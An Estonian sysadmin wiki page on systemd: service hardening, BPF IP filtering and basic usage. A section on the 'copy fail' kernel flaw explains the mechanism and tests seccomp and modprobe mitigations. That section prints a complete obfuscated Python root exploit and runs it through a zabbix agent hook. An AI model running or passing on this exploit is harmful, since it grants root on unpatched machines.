su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (asuvad arvuti mälus)

|
v

vfs (virtual file system) (asub arvuti mälus)

|
v

page cache (asub arvuti mälus)

|
v

ext4 filesystem (asub plokkseadmel)

|
v

plokkseade (asub nö füüsilisel esemel)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

Leevenduste iseloomustus

* systemd (seccomp) - operatsioonisüsteemi syscall liidesel asuv nö tulemüür, mingis mõttes asub kerneli protsesside poole vaatavas osas
* apparmor - erinevate süsteemi võimekustele ligipääsemise takistamised (asub kerneli protsesside poole vaatavast osast teisel pool)
* modprobe - kerneli funktsionaalsust realiseeriv komponent (kahe esimese puhul ei saa funktsionaalust kasutada isegi kui kernelis on see iseenest kohal)

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Systemd kasutamine

2026-05-02T10:07:56Z

Imre: /* Tööpõhimõte - eksploit */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timedated on ntp klient, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

